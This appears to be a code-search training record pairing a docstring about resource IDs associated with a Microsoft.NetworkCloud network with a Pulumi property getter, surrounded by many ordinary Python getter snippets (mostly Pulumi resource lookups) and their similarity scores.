"def get(resource_name: str,\n id: pulumi.Input[str],\n opts: Optional[pulumi.ResourceOptions] = None,\n add_on: Optional[pulumi.Input[pulumi.InputType['InstanceAddOnArgs']]] = None,\n arn: Optional[pulumi.Input[str]] = None,\n availability_zone: Optional[pulumi.Input[str]] = None,\n blueprint_id: Optional[pulumi.Input[str]] = None,\n bundle_id: Optional[pulumi.Input[str]] = None,\n cpu_count: Optional[pulumi.Input[int]] = None,\n created_at: Optional[pulumi.Input[str]] = None,\n ip_address_type: Optional[pulumi.Input[str]] = None,\n ipv6_address: Optional[pulumi.Input[str]] = None,\n ipv6_addresses: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n is_static_ip: Optional[pulumi.Input[bool]] = None,\n key_pair_name: Optional[pulumi.Input[str]] = None,\n name: Optional[pulumi.Input[str]] = None,\n private_ip_address: Optional[pulumi.Input[str]] = None,\n public_ip_address: Optional[pulumi.Input[str]] = None,\n ram_size: Optional[pulumi.Input[float]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n user_data: Optional[pulumi.Input[str]] = None,\n username: Optional[pulumi.Input[str]] = None) -> 'Instance':\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n\n __props__ = _InstanceState.__new__(_InstanceState)\n\n __props__.__dict__[\"add_on\"] = add_on\n __props__.__dict__[\"arn\"] = arn\n __props__.__dict__[\"availability_zone\"] = availability_zone\n __props__.__dict__[\"blueprint_id\"] = blueprint_id\n __props__.__dict__[\"bundle_id\"] = bundle_id\n __props__.__dict__[\"cpu_count\"] = cpu_count\n __props__.__dict__[\"created_at\"] = created_at\n __props__.__dict__[\"ip_address_type\"] = ip_address_type\n __props__.__dict__[\"ipv6_address\"] = ipv6_address\n __props__.__dict__[\"ipv6_addresses\"] = ipv6_addresses\n __props__.__dict__[\"is_static_ip\"] = is_static_ip\n __props__.__dict__[\"key_pair_name\"] = key_pair_name\n __props__.__dict__[\"name\"] = name\n __props__.__dict__[\"private_ip_address\"] = private_ip_address\n __props__.__dict__[\"public_ip_address\"] = public_ip_address\n __props__.__dict__[\"ram_size\"] = ram_size\n __props__.__dict__[\"tags\"] = tags\n __props__.__dict__[\"tags_all\"] = tags_all\n __props__.__dict__[\"user_data\"] = user_data\n __props__.__dict__[\"username\"] = username\n return Instance(resource_name, opts=opts, __props__=__props__)",
"def get_by_state(self, pool_name, states, all=False):\n\t\tif not all:\n\t\t\tfor mission in getattr(self, pool_name).values():\n\t\t\t\tif mission.state in states:\n\t\t\t\t\treturn mission\n\t\t\treturn None\n\t\telse:\n\t\t\toutput = []\n\t\t\tfor mission in getattr(self, pool_name).values():\n\t\t\t\tif mission.state in states:\n\t\t\t\t\toutput.append(mission)\n\t\t\treturn output",
"def state_id(id):\n flag = 0\n states = storage.all(State).values()\n for state in states:\n if state.id == id:\n flag = 1\n break\n return render_template('9-states.html', state=state, flag=flag)",
"def getNetworkById(self, session: Session, id_: str):\n try:\n return NetworkManager().getNetworkById(session, id_)\n except TortugaException as ex:\n raise\n except Exception as ex:\n self._logger.exception(str(ex))\n raise TortugaException(exception=ex)",
"def get(resource_name: str,\n id: pulumi.Input[str],\n opts: Optional[pulumi.ResourceOptions] = None) -> 'FhirStore':\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n\n __props__ = FhirStoreArgs.__new__(FhirStoreArgs)\n\n __props__.__dict__[\"complex_data_type_reference_parsing\"] = None\n __props__.__dict__[\"dataset_id\"] = None\n __props__.__dict__[\"default_search_handling_strict\"] = None\n __props__.__dict__[\"disable_referential_integrity\"] = None\n __props__.__dict__[\"disable_resource_versioning\"] = None\n __props__.__dict__[\"enable_update_create\"] = None\n __props__.__dict__[\"fhir_store_id\"] = None\n __props__.__dict__[\"labels\"] = None\n __props__.__dict__[\"location\"] = None\n __props__.__dict__[\"name\"] = None\n __props__.__dict__[\"notification_config\"] = None\n __props__.__dict__[\"notification_configs\"] = None\n __props__.__dict__[\"project\"] = None\n __props__.__dict__[\"stream_configs\"] = None\n __props__.__dict__[\"validation_config\"] = None\n __props__.__dict__[\"version\"] = None\n return FhirStore(resource_name, opts=opts, __props__=__props__)",
"def get(resource_name: str,\n id: pulumi.Input[str],\n opts: Optional[pulumi.ResourceOptions] = None,\n cidr: Optional[pulumi.Input[str]] = None,\n description: Optional[pulumi.Input[str]] = None,\n publish_cidr_route: Optional[pulumi.Input[bool]] = None,\n transit_router_cidr_id: Optional[pulumi.Input[str]] = None,\n transit_router_cidr_name: Optional[pulumi.Input[str]] = None,\n transit_router_id: Optional[pulumi.Input[str]] = None) -> 'TransitRouterCidr':\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n\n __props__ = _TransitRouterCidrState.__new__(_TransitRouterCidrState)\n\n __props__.__dict__[\"cidr\"] = cidr\n __props__.__dict__[\"description\"] = description\n __props__.__dict__[\"publish_cidr_route\"] = publish_cidr_route\n __props__.__dict__[\"transit_router_cidr_id\"] = transit_router_cidr_id\n __props__.__dict__[\"transit_router_cidr_name\"] = transit_router_cidr_name\n __props__.__dict__[\"transit_router_id\"] = transit_router_id\n return TransitRouterCidr(resource_name, opts=opts, __props__=__props__)",
"def get(resource_name: str,\n id: pulumi.Input[str],\n opts: Optional[pulumi.ResourceOptions] = None,\n action: Optional[pulumi.Input[str]] = None,\n layer_name: Optional[pulumi.Input[str]] = None,\n organization_id: Optional[pulumi.Input[str]] = None,\n policy: Optional[pulumi.Input[str]] = None,\n principal: Optional[pulumi.Input[str]] = None,\n revision_id: Optional[pulumi.Input[str]] = None,\n statement_id: Optional[pulumi.Input[str]] = None,\n version_number: Optional[pulumi.Input[int]] = None) -> 'LayerVersionPermission':\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n\n __props__ = _LayerVersionPermissionState.__new__(_LayerVersionPermissionState)\n\n __props__.__dict__[\"action\"] = action\n __props__.__dict__[\"layer_name\"] = layer_name\n __props__.__dict__[\"organization_id\"] = organization_id\n __props__.__dict__[\"policy\"] = policy\n __props__.__dict__[\"principal\"] = principal\n __props__.__dict__[\"revision_id\"] = revision_id\n __props__.__dict__[\"statement_id\"] = statement_id\n __props__.__dict__[\"version_number\"] = version_number\n return LayerVersionPermission(resource_name, opts=opts, __props__=__props__)",
"def get(resource_name: str,\n id: pulumi.Input[str],\n opts: Optional[pulumi.ResourceOptions] = None,\n business_status: Optional[pulumi.Input[str]] = None,\n create_time: Optional[pulumi.Input[str]] = None,\n description: Optional[pulumi.Input[str]] = None,\n expired_time: Optional[pulumi.Input[str]] = None,\n instance_charge_type: Optional[pulumi.Input[str]] = None,\n ipv6_gateway_id: Optional[pulumi.Input[str]] = None,\n ipv6_gateway_name: Optional[pulumi.Input[str]] = None,\n resource_group_id: Optional[pulumi.Input[str]] = None,\n spec: Optional[pulumi.Input[str]] = None,\n status: Optional[pulumi.Input[str]] = None,\n tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,\n vpc_id: Optional[pulumi.Input[str]] = None) -> 'Ipv6Gateway':\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n\n __props__ = _Ipv6GatewayState.__new__(_Ipv6GatewayState)\n\n __props__.__dict__[\"business_status\"] = business_status\n __props__.__dict__[\"create_time\"] = create_time\n __props__.__dict__[\"description\"] = description\n __props__.__dict__[\"expired_time\"] = expired_time\n __props__.__dict__[\"instance_charge_type\"] = instance_charge_type\n __props__.__dict__[\"ipv6_gateway_id\"] = ipv6_gateway_id\n __props__.__dict__[\"ipv6_gateway_name\"] = ipv6_gateway_name\n __props__.__dict__[\"resource_group_id\"] = resource_group_id\n __props__.__dict__[\"spec\"] = spec\n __props__.__dict__[\"status\"] = status\n __props__.__dict__[\"tags\"] = tags\n __props__.__dict__[\"vpc_id\"] = vpc_id\n return Ipv6Gateway(resource_name, opts=opts, __props__=__props__)",
"def get_node(self, state):\n return self.nodes.get(Node.state_as_string(state))",
"def resolve_from_local_lookup_table(self, id: str) -> GeoLocation:\n return self.local_lookup(id)",
"def get_layer(self, name=None, index=None):\n # TODO(fchollet): We could build a dictionary based on layer names\n # since they are constant, but we have not done that yet.\n if index is not None:\n if len(self.layers) <= index:\n raise ValueError('Was asked to retrieve layer at index ' + str(index) +\n ' but model only has ' + str(len(self.layers)) +\n ' layers.')\n else:\n return self.layers[index]\n else:\n if not name:\n raise ValueError('Provide either a layer name or layer index.')\n for layer in self.layers:\n if layer.name == name:\n return layer\n raise ValueError('No such layer: ' + name)",
"def get(resource_name: str,\n id: pulumi.Input[str],\n opts: Optional[pulumi.ResourceOptions] = None,\n arn: Optional[pulumi.Input[str]] = None,\n description: Optional[pulumi.Input[str]] = None,\n destination_cidr_block: Optional[pulumi.Input[str]] = None,\n destination_port_range: Optional[pulumi.Input[pulumi.InputType['TrafficMirrorFilterRuleDestinationPortRangeArgs']]] = None,\n protocol: Optional[pulumi.Input[int]] = None,\n rule_action: Optional[pulumi.Input[str]] = None,\n rule_number: Optional[pulumi.Input[int]] = None,\n source_cidr_block: Optional[pulumi.Input[str]] = None,\n source_port_range: Optional[pulumi.Input[pulumi.InputType['TrafficMirrorFilterRuleSourcePortRangeArgs']]] = None,\n traffic_direction: Optional[pulumi.Input[str]] = None,\n traffic_mirror_filter_id: Optional[pulumi.Input[str]] = None) -> 'TrafficMirrorFilterRule':\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n\n __props__ = _TrafficMirrorFilterRuleState.__new__(_TrafficMirrorFilterRuleState)\n\n __props__.__dict__[\"arn\"] = arn\n __props__.__dict__[\"description\"] = description\n __props__.__dict__[\"destination_cidr_block\"] = destination_cidr_block\n __props__.__dict__[\"destination_port_range\"] = destination_port_range\n __props__.__dict__[\"protocol\"] = protocol\n __props__.__dict__[\"rule_action\"] = rule_action\n __props__.__dict__[\"rule_number\"] = rule_number\n __props__.__dict__[\"source_cidr_block\"] = source_cidr_block\n __props__.__dict__[\"source_port_range\"] = source_port_range\n __props__.__dict__[\"traffic_direction\"] = traffic_direction\n __props__.__dict__[\"traffic_mirror_filter_id\"] = traffic_mirror_filter_id\n return TrafficMirrorFilterRule(resource_name, opts=opts, __props__=__props__)",
"def get(self, state):\n return state[self.primary or self]",
"def get_subnet(self, name_or_id, filters=None):\n if not filters:\n filters = {}\n return self.network.find_subnet(\n name_or_id=name_or_id, ignore_missing=True, **filters\n )",
"def get(self, filter='assigned', state='open', labels=None,\r\n sort='created', direction='desc', since=None, format=None,\r\n page=None, per_page=None):\r\n url = self.get_url()\r\n params = base.get_params(\r\n ('filter', 'state', 'labels', 'sort', 'direction',\r\n 'since', 'page', 'per_page'), locals())\r\n\r\n headers = resource.mimetype_accept(format)\r\n\r\n return http.Request('GET', url, params, headers), parsers.parse_json",
"def get(resource_name: str,\n id: pulumi.Input[str],\n opts: Optional[pulumi.ResourceOptions] = None,\n application_insights_id: Optional[pulumi.Input[str]] = None,\n container_registry_id: Optional[pulumi.Input[str]] = None,\n description: Optional[pulumi.Input[str]] = None,\n discovery_url: Optional[pulumi.Input[str]] = None,\n encryption: Optional[pulumi.Input[pulumi.InputType['WorkspaceEncryptionArgs']]] = None,\n friendly_name: Optional[pulumi.Input[str]] = None,\n high_business_impact: Optional[pulumi.Input[bool]] = None,\n identity: Optional[pulumi.Input[pulumi.InputType['WorkspaceIdentityArgs']]] = None,\n image_build_compute_name: Optional[pulumi.Input[str]] = None,\n key_vault_id: Optional[pulumi.Input[str]] = None,\n location: Optional[pulumi.Input[str]] = None,\n name: Optional[pulumi.Input[str]] = None,\n primary_user_assigned_identity: Optional[pulumi.Input[str]] = None,\n public_access_behind_virtual_network_enabled: Optional[pulumi.Input[bool]] = None,\n public_network_access_enabled: Optional[pulumi.Input[bool]] = None,\n resource_group_name: Optional[pulumi.Input[str]] = None,\n sku_name: Optional[pulumi.Input[str]] = None,\n storage_account_id: Optional[pulumi.Input[str]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n v1_legacy_mode_enabled: Optional[pulumi.Input[bool]] = None,\n workspace_id: Optional[pulumi.Input[str]] = None) -> 'Workspace':\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n\n __props__ = _WorkspaceState.__new__(_WorkspaceState)\n\n __props__.__dict__[\"application_insights_id\"] = application_insights_id\n __props__.__dict__[\"container_registry_id\"] = container_registry_id\n __props__.__dict__[\"description\"] = description\n __props__.__dict__[\"discovery_url\"] = discovery_url\n __props__.__dict__[\"encryption\"] = encryption\n __props__.__dict__[\"friendly_name\"] = friendly_name\n __props__.__dict__[\"high_business_impact\"] = high_business_impact\n __props__.__dict__[\"identity\"] = identity\n __props__.__dict__[\"image_build_compute_name\"] = image_build_compute_name\n __props__.__dict__[\"key_vault_id\"] = key_vault_id\n __props__.__dict__[\"location\"] = location\n __props__.__dict__[\"name\"] = name\n __props__.__dict__[\"primary_user_assigned_identity\"] = primary_user_assigned_identity\n __props__.__dict__[\"public_access_behind_virtual_network_enabled\"] = public_access_behind_virtual_network_enabled\n __props__.__dict__[\"public_network_access_enabled\"] = public_network_access_enabled\n __props__.__dict__[\"resource_group_name\"] = resource_group_name\n __props__.__dict__[\"sku_name\"] = sku_name\n __props__.__dict__[\"storage_account_id\"] = storage_account_id\n __props__.__dict__[\"tags\"] = tags\n __props__.__dict__[\"v1_legacy_mode_enabled\"] = v1_legacy_mode_enabled\n __props__.__dict__[\"workspace_id\"] = workspace_id\n return Workspace(resource_name, opts=opts, __props__=__props__)",
"def get(resource_name: str,\n id: pulumi.Input[str],\n opts: Optional[pulumi.ResourceOptions] = None) -> 'Machine':\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n\n __props__ = MachineArgs.__new__(MachineArgs)\n\n __props__.__dict__[\"ad_fqdn\"] = None\n __props__.__dict__[\"agent_configuration\"] = None\n __props__.__dict__[\"agent_upgrade\"] = None\n __props__.__dict__[\"agent_version\"] = None\n __props__.__dict__[\"client_public_key\"] = None\n __props__.__dict__[\"cloud_metadata\"] = None\n __props__.__dict__[\"detected_properties\"] = None\n __props__.__dict__[\"display_name\"] = None\n __props__.__dict__[\"dns_fqdn\"] = None\n __props__.__dict__[\"domain_name\"] = None\n __props__.__dict__[\"error_details\"] = None\n __props__.__dict__[\"extensions\"] = None\n __props__.__dict__[\"identity\"] = None\n __props__.__dict__[\"last_status_change\"] = None\n __props__.__dict__[\"location\"] = None\n __props__.__dict__[\"location_data\"] = None\n __props__.__dict__[\"machine_fqdn\"] = None\n __props__.__dict__[\"mssql_discovered\"] = None\n __props__.__dict__[\"name\"] = None\n __props__.__dict__[\"os_name\"] = None\n __props__.__dict__[\"os_profile\"] = None\n __props__.__dict__[\"os_sku\"] = None\n __props__.__dict__[\"os_type\"] = None\n __props__.__dict__[\"os_version\"] = None\n __props__.__dict__[\"parent_cluster_resource_id\"] = None\n __props__.__dict__[\"private_link_scope_resource_id\"] = None\n __props__.__dict__[\"provisioning_state\"] = None\n __props__.__dict__[\"resources\"] = None\n __props__.__dict__[\"service_statuses\"] = None\n __props__.__dict__[\"status\"] = None\n __props__.__dict__[\"system_data\"] = None\n __props__.__dict__[\"tags\"] = None\n __props__.__dict__[\"type\"] = None\n __props__.__dict__[\"vm_id\"] = None\n __props__.__dict__[\"vm_uuid\"] = None\n return Machine(resource_name, opts=opts, __props__=__props__)",
"def get(self, depth=None, selector=None):\n logging.info(\"Retrieving %s from switch\", self)\n\n depth = depth or self.session.api.default_depth\n selector = selector or self.session.api.default_selector\n\n if not self.session.api.valid_depth(depth):\n depths = self.session.api.valid_depths\n raise Exception(\"ERROR: Depth should be {0}\".format(depths))\n\n if selector not in self.session.api.valid_selectors:\n selectors = \" \".join(self.session.api.valid_selectors)\n raise Exception(\n \"ERROR: Selector should be one of {0}\".format(selectors)\n )\n\n payload = {\"depth\": depth, \"selector\": selector}\n\n uri = \"{0}/{1}\".format(self.base_uri, self.ip_or_ifname_or_group_name)\n\n try:\n response = self.session.request(\"GET\", uri, params=payload)\n\n except Exception as e:\n raise ResponseError(\"GET\", e)\n\n if not utils._response_ok(response, \"GET\"):\n raise GenericOperationError(response.text, response.status_code)\n\n data = json.loads(response.text)\n\n # Add dictionary as attributes for the object\n utils.create_attrs(self, data)\n\n # Determines if the BGP Neighbor is configurable\n if selector in self.session.api.configurable_selectors:\n # Set self.config_attrs and delete ID from it\n utils.set_config_attrs(\n self, data, \"config_attrs\", [\"ip_or_ifname_or_group_name\"]\n )\n\n # Set original attributes\n self.__original_attributes = data\n # Remove ID\n if \"ip_or_ifname_or_group_name\" in self.__original_attributes:\n self.__original_attributes.pop(\"ip_or_ifname_or_group_name\")\n\n # If the BGP Neighbor has a local_interface inside the switch\n if hasattr(self, \"local_interface\") and self.local_interface:\n local_interface_response = self.local_interface\n interface_cls = self.session.api.get_module(\n self.session, \"Interface\", \"\"\n )\n # Set port as a Interface Object\n self.local_interface = interface_cls.from_response(\n self.session, local_interface_response\n )\n self.local_interface.get()\n\n # Sets object as materialized\n # Information is loaded from the Device\n self.materialized = True\n return True",
"def get(resource_name: str,\n id: pulumi.Input[str],\n opts: Optional[pulumi.ResourceOptions] = None,\n auto_renew: Optional[pulumi.Input[bool]] = None,\n auto_renew_period: Optional[pulumi.Input[int]] = None,\n cluster_name: Optional[pulumi.Input[str]] = None,\n data_center_name: Optional[pulumi.Input[str]] = None,\n disk_size: Optional[pulumi.Input[int]] = None,\n disk_type: Optional[pulumi.Input[str]] = None,\n enable_public: Optional[pulumi.Input[bool]] = None,\n instance_type: Optional[pulumi.Input[str]] = None,\n ip_white: Optional[pulumi.Input[str]] = None,\n maintain_end_time: Optional[pulumi.Input[str]] = None,\n maintain_start_time: Optional[pulumi.Input[str]] = None,\n major_version: Optional[pulumi.Input[str]] = None,\n node_count: Optional[pulumi.Input[int]] = None,\n password: Optional[pulumi.Input[str]] = None,\n pay_type: Optional[pulumi.Input[str]] = None,\n period: Optional[pulumi.Input[int]] = None,\n period_unit: Optional[pulumi.Input[str]] = None,\n public_points: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n security_groups: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n status: Optional[pulumi.Input[str]] = None,\n tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,\n vswitch_id: Optional[pulumi.Input[str]] = None,\n zone_id: Optional[pulumi.Input[str]] = None) -> 'Cluster':\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n\n __props__ = _ClusterState.__new__(_ClusterState)\n\n __props__.__dict__[\"auto_renew\"] = auto_renew\n __props__.__dict__[\"auto_renew_period\"] = auto_renew_period\n __props__.__dict__[\"cluster_name\"] = cluster_name\n __props__.__dict__[\"data_center_name\"] = data_center_name\n __props__.__dict__[\"disk_size\"] = disk_size\n __props__.__dict__[\"disk_type\"] = disk_type\n __props__.__dict__[\"enable_public\"] = enable_public\n __props__.__dict__[\"instance_type\"] = instance_type\n __props__.__dict__[\"ip_white\"] = ip_white\n __props__.__dict__[\"maintain_end_time\"] = maintain_end_time\n __props__.__dict__[\"maintain_start_time\"] = maintain_start_time\n __props__.__dict__[\"major_version\"] = major_version\n __props__.__dict__[\"node_count\"] = node_count\n __props__.__dict__[\"password\"] = password\n __props__.__dict__[\"pay_type\"] = pay_type\n __props__.__dict__[\"period\"] = period\n __props__.__dict__[\"period_unit\"] = period_unit\n __props__.__dict__[\"public_points\"] = public_points\n __props__.__dict__[\"security_groups\"] = security_groups\n __props__.__dict__[\"status\"] = status\n __props__.__dict__[\"tags\"] = tags\n __props__.__dict__[\"vswitch_id\"] = vswitch_id\n __props__.__dict__[\"zone_id\"] = zone_id\n return Cluster(resource_name, opts=opts, __props__=__props__)",
"def network_get(auth=None, **kwargs):\n cloud = get_operator_cloud(auth)\n kwargs = _clean_kwargs(**kwargs)\n return cloud.get_network(**kwargs)",
"def get_network_interface(\n name=None,\n network_interface_id=None,\n region=None,\n key=None,\n keyid=None,\n profile=None,\n):\n conn = _get_conn(region=region, key=key, keyid=keyid, profile=profile)\n r = {}\n result = _get_network_interface(conn, name, network_interface_id)\n if \"error\" in result:\n if result[\"error\"][\"message\"] == \"No ENIs found.\":\n r[\"result\"] = None\n return r\n return result\n eni = result[\"result\"]\n r[\"result\"] = _describe_network_interface(eni)\n return r",
"def get_state_machine(self, name):\n response = self.client.list_state_machines()\n print(response)\n if not response.get('stateMachines'):\n return None\n for sm in response.get('stateMachines'):\n if sm['name'] == name:\n return sm['stateMachineArn']",
"def state(self):\n state = self._resource.get('state', self.default_state)\n\n if state in State:\n return state\n else:\n return getattr(State, state)",
"def get(resource_name: str,\n id: pulumi.Input[str],\n opts: Optional[pulumi.ResourceOptions] = None,\n name: Optional[pulumi.Input[str]] = None,\n virtual_hub_id: Optional[pulumi.Input[str]] = None) -> 'VirtualNetworkAppliance':\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n\n __props__ = _VirtualNetworkApplianceState.__new__(_VirtualNetworkApplianceState)\n\n __props__.__dict__[\"name\"] = name\n __props__.__dict__[\"virtual_hub_id\"] = virtual_hub_id\n return VirtualNetworkAppliance(resource_name, opts=opts, __props__=__props__)",
"def get_resource(self, node_name, resource_name):\n\n if self._xmldoc is None:\n return None\n\n xmlroot = self._xmldoc.getroot()\n\n xmlresource = xmlroot.find(\".//status/node_state[@id='%s']/\"\n \"lrm[@id='%s']/lrm_resources/\"\n \"lrm_resource[@id='%s']/lrm_rsc_op\"\n % (node_name, node_name, resource_name))\n if not etree.iselement(xmlresource):\n return None\n\n resource = PaceMakerResource(node_name, resource_name)\n\n resource.last_operation = xmlresource.attrib[\"operation\"]\n\n if (xmlresource.attrib[\"operation\"] == \"start\" or\n xmlresource.attrib[\"operation\"] == \"promote\"):\n if xmlresource.attrib[\"rc-code\"] == \"0\":\n resource.state = RESOURCE_STATE_ENABLED\n else:\n resource.state = RESOURCE_STATE_FAILED\n\n elif (xmlresource.attrib[\"operation\"] == \"stop\" or\n xmlresource.attrib[\"operation\"] == \"demote\"):\n if xmlresource.attrib[\"rc-code\"] == \"0\":\n resource.state = RESOURCE_STATE_DISABLED\n else:\n resource.state = RESOURCE_STATE_FAILED\n\n elif xmlresource.attrib[\"operation\"] == \"monitor\":\n if xmlresource.attrib[\"rc-code\"] == \"0\":\n resource.state = RESOURCE_STATE_ENABLED\n elif xmlresource.attrib[\"rc-code\"] == \"7\":\n resource.state = RESOURCE_STATE_DISABLED\n else:\n resource.state = RESOURCE_STATE_FAILED\n else:\n resource.state = RESOURCE_STATE_UNKNOWN\n\n return resource",
"def get_uid_state(self, id_or_uri):\n uri = self._client.build_uri(id_or_uri) + \"/uidState\"\n return self._client.get(uri)",
"def get(resource_name: str,\n id: pulumi.Input[str],\n opts: Optional[pulumi.ResourceOptions] = None,\n backup_pool: Optional[pulumi.Input[str]] = None,\n description: Optional[pulumi.Input[str]] = None,\n failover_ratio: Optional[pulumi.Input[float]] = None,\n health_checks: Optional[pulumi.Input[str]] = None,\n instances: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n name: Optional[pulumi.Input[str]] = None,\n project: Optional[pulumi.Input[str]] = None,\n region: Optional[pulumi.Input[str]] = None,\n self_link: Optional[pulumi.Input[str]] = None,\n session_affinity: Optional[pulumi.Input[str]] = None) -> 'TargetPool':\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n\n __props__ = _TargetPoolState.__new__(_TargetPoolState)\n\n __props__.__dict__[\"backup_pool\"] = backup_pool\n __props__.__dict__[\"description\"] = description\n __props__.__dict__[\"failover_ratio\"] = failover_ratio\n __props__.__dict__[\"health_checks\"] = health_checks\n __props__.__dict__[\"instances\"] = instances\n __props__.__dict__[\"name\"] = name\n __props__.__dict__[\"project\"] = project\n __props__.__dict__[\"region\"] = region\n __props__.__dict__[\"self_link\"] = self_link\n __props__.__dict__[\"session_affinity\"] = session_affinity\n return TargetPool(resource_name, opts=opts, __props__=__props__)"
] | [
"0.5696972",
"0.5616301",
"0.559337",
"0.55891603",
"0.55436486",
"0.5497109",
"0.54890585",
"0.5482085",
"0.5455767",
"0.5444336",
"0.54149556",
"0.53990793",
"0.53760177",
"0.53489095",
"0.534057",
"0.5307886",
"0.5290895",
"0.529065",
"0.5247792",
"0.5244457",
"0.5226916",
"0.5215637",
"0.520895",
"0.5200015",
"0.516398",
"0.50524247",
"0.5008109",
"0.4965296",
"0.4962385",
"0.4961434",
"0.49410954",
"0.49284518",
"0.49163172",
"0.49142632",
"0.48865956",
"0.48708117",
"0.486166",
"0.48527232",
"0.48480058",
"0.48449975",
"0.4840699",
"0.48014778",
"0.48004532",
"0.47821766",
"0.47713277",
"0.47684792",
"0.47678363",
"0.47452232",
"0.47442412",
"0.47119805",
"0.4709975",
"0.46966147",
"0.46908882",
"0.46894923",
"0.46746296",
"0.46645778",
"0.46626875",
"0.46570235",
"0.46522754",
"0.46473414",
"0.46413997",
"0.4634389",
"0.4628288",
"0.45980322",
"0.45968214",
"0.4588655",
"0.4572744",
"0.45705715",
"0.45560083",
"0.45511425",
"0.45459312",
"0.45441487",
"0.4527366",
"0.45256647",
"0.45247942",
"0.4517443",
"0.45172703",
"0.45119807",
"0.45095566",
"0.45084855",
"0.45080325",
"0.45051858",
"0.44962224",
"0.4493394",
"0.44933766",
"0.44827092",
"0.44762692",
"0.4474365",
"0.44688186",
"0.44606164",
"0.44562405",
"0.44451553",
"0.44445923",
"0.44393697",
"0.44383848",
"0.44305983",
"0.44295493",
"0.44154134",
"0.44128808",
"0.44118914"
] | 0.6454363 | 0 |
The list of resource IDs for the other Microsoft.NetworkCloud resources that have attached this network. | def associated_resource_ids(self) -> pulumi.Output[Sequence[str]]:
return pulumi.get(self, "associated_resource_ids") | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def network_ids(self):\n return self._network_ids",
"def otherResources(self):\n return self._get_list_field(\"otherResources\")",
"def resource_names(self):\n return self._resource_names",
"def get_ids(self):\n all_networks = []\n network_dict = {}\n for network, status in self.networks.items():\n if status[\"onboarded\"]:\n all_networks.append(\"{}\".format(network))\n network_dict[status[\"name\"]] = network\n\n self.network_ids = all_networks\n return network_dict",
"def network_fabric_ids(self) -> pulumi.Output[Sequence[str]]:\n return pulumi.get(self, \"network_fabric_ids\")",
"def resources(self):\n return self._resources",
"def resources(self):\n return self._resources",
"def resources(self):\n return self._resources",
"def GetResourceNames(self):\r\n return [x.name for x in self.resources]",
"def getResources(self):\n\t\treturn deepcopy(self.server.resources)",
"def resources(self):\n res = []\n for resource in self._resources:\n res = res + resource.resources()\n\n return res",
"def resources(self):\n res = []\n for resource in self._resources:\n res = res + resource.resources()\n\n return res",
"def network_interface_ids(self) -> Optional[Sequence[str]]:\n return pulumi.get(self, \"network_interface_ids\")",
"def parent_resources(cls):\n parent = cls.parent_resource\n parents = [parent]\n\n try:\n while True:\n parent = parent.parent_resource\n parents.append(parent)\n except AttributeError:\n pass\n\n parents.reverse()\n return parents",
"def link_ids(self):\n return self._link_ids",
"def get_resources(self):\n return []",
"def resources(self) -> \"Resources\":\n return self._resources",
"def tenant_internet_gateway_ids(self) -> pulumi.Output[Sequence[str]]:\n return pulumi.get(self, \"tenant_internet_gateway_ids\")",
"def get_parent_resource_nodes(self):\n raise errors.Unimplemented()",
"def pool_ids(self) -> Sequence[str]:\n return pulumi.get(self, \"pool_ids\")",
"def ids(self):\n return self._ids",
"def list_networks():\n return __sets.keys()",
"def virtual_machines_associated_ids(self) -> pulumi.Output[Sequence[str]]:\n return pulumi.get(self, \"virtual_machines_associated_ids\")",
"def virtual_machines_associated_ids(self) -> pulumi.Output[Sequence[str]]:\n return pulumi.get(self, \"virtual_machines_associated_ids\")",
"def resource_names(self) -> Optional[Sequence[str]]:\n return pulumi.get(self, \"resource_names\")",
"def resource_names(self) -> Optional[Sequence[str]]:\n return pulumi.get(self, \"resource_names\")",
"def resources(self) -> [ListResourcesResponse]:\n resources = []\n\n layers = self.layers\n for layer_name in layers:\n layer_arns = self.layer_version_arns(layer_name)\n for arn in layer_arns:\n list_resources_response = ListResourcesResponse(\n service=self.service, account_id=self.current_account_id, arn=arn, region=self.region,\n resource_type=self.resource_type, name=layer_name)\n resources.append(list_resources_response)\n return resources",
"def cloud_ids(self):\n if self.stage == 'trainval':\n ids = self.all_cloud_ids['train'] + self.all_cloud_ids['val']\n else:\n ids = self.all_cloud_ids[self.stage]\n return sorted(list(set(ids)))",
"def parent_ids(self):\n return self._parent_ids",
"def remote_get_ids(self):\n return self.smultiengine.get_ids()",
"def resources(self) -> Optional[Sequence[str]]:\n return pulumi.get(self, \"resources\")",
"def resources(self) -> Optional[Sequence[str]]:\n return pulumi.get(self, \"resources\")",
"def resources(self) -> Optional[Sequence[str]]:\n return pulumi.get(self, \"resources\")",
"def resources(self) -> Optional[Sequence[str]]:\n return pulumi.get(self, \"resources\")",
"def get_ids(self):\n return self._ids",
"def resources(self) -> Sequence['outputs.GetResourcesResourceResult']:\n return pulumi.get(self, \"resources\")",
"def resources(self) -> pulumi.Output[Sequence['outputs.MachineExtensionResponse']]:\n return pulumi.get(self, \"resources\")",
"def GetExclusiveResources(self):\n res = set(self.exclusive_resources)\n if self.parent:\n res |= self.parent.GetExclusiveResources()\n return res",
"def related_resources(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['KlusterletStatusRelatedResourcesArgs']]]]:\n return pulumi.get(self, \"related_resources\")",
